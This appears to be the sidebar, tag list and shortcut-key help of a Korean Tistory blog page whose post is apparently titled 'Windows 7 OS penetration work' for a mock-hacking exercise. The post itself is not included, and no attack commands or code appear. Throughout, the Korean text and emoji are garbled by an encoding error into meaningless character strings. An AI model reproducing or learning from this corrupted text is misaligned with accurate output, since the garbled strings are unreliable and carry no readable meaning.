      • ๐Ÿ‘ฅ ๋ฒ„์ „๊ด€๋ฆฌ & ํ˜‘์—…๋„๊ตฌ (9)
        • Git, GitHub (4)
        • etc (5)
      • ๐Ÿ’œ ์ผ์ƒ (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ํƒœ๊ทธ
    • ๋ฐฉ๋ช…๋ก
  • ๋งํฌ

    • GitHub
  • ๊ณต์ง€์‚ฌํ•ญ

    • ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค!
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    ์ •๋ณด๋ณด์•ˆ
    ๊นƒํ—ˆ๋ธŒ
    sk์‰ด๋”์Šค๋ฃจํ‚ค์ฆˆ
    ์™€์ด์–ด์ƒคํฌ
    ์˜นํ”Œ๋ขฐ๋ฅด
    ์œ ๋Ÿฝ์—ฌํ–‰
    Python
    git
    ๋ณด์•ˆ์‹ค์Šต
    flask
    ๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ
    ํ”Œ๋ผ์Šคํฌ
    ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค
    ์œˆ๋„์šฐ๋ณด์•ˆ
    ํ•œ๋‹ฌ์—ฌํ–‰
    ๋ธ”๋ก์ฒด์ธ์‹ค์Šต
    slack
    ์นผ๋ฆฌ๋ฆฌ๋ˆ…์Šค
    VSCode
    ๋ชจ์˜ํ•ดํ‚น
    ํ”„๋ž‘์Šค์—ฌํ–‰
    ๋ชฝ์ƒ๋ฏธ์…ธ
    Github
    ๋Ÿฐ๋˜์—ฌํ–‰
    ํŒŒ๋ฆฌ์—ฌํ–‰
    ํŒŒ์ด์ฌ
    ์ฝ”๋”ฉํ…Œ์ŠคํŠธ
    ์œ ๋Ÿฝํ•œ๋‹ฌ์—ฌํ–‰
    ํ•ด์™ธ์—ฌํ–‰
    ํ˜‘์—…๋„๊ตฌ
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

  • 160x600
    250x250
  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.3
WISHee
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ7 OS ์นจํˆฌ ์ž‘์—…

๊ฐœ์ธ์ •๋ณด

  • ํ‹ฐ์Šคํ† ๋ฆฌ ํ™ˆ
  • ํฌ๋Ÿผ
  • ๋กœ๊ทธ์ธ
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”

๋‹จ์ถ•ํ‚ค

๋‚ด ๋ธ”๋กœ๊ทธ

๋‚ด ๋ธ”๋กœ๊ทธ - ๊ด€๋ฆฌ์ž ํ™ˆ ์ „ํ™˜
Q
Q
์ƒˆ ๊ธ€ ์“ฐ๊ธฐ
W
W

๋ธ”๋กœ๊ทธ ๊ฒŒ์‹œ๊ธ€

๊ธ€ ์ˆ˜์ • (๊ถŒํ•œ ์žˆ๋Š” ๊ฒฝ์šฐ)
E
E
๋Œ“๊ธ€ ์˜์—ญ์œผ๋กœ ์ด๋™
C
C

๋ชจ๋“  ์˜์—ญ

์ด ํŽ˜์ด์ง€์˜ URL ๋ณต์‚ฌ
S
S
๋งจ ์œ„๋กœ ์ด๋™
T
T
ํ‹ฐ์Šคํ† ๋ฆฌ ํ™ˆ ์ด๋™
H
H
๋‹จ์ถ•ํ‚ค ์•ˆ๋‚ด
Shift + /
โ‡ง + /

* ๋‹จ์ถ•ํ‚ค๋Š” ํ•œ๊ธ€/์˜๋ฌธ ๋Œ€์†Œ๋ฌธ์ž๋กœ ์ด์šฉ ๊ฐ€๋Šฅํ•˜๋ฉฐ, ํ‹ฐ์Šคํ† ๋ฆฌ ๊ธฐ๋ณธ ๋„๋ฉ”์ธ์—์„œ๋งŒ ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.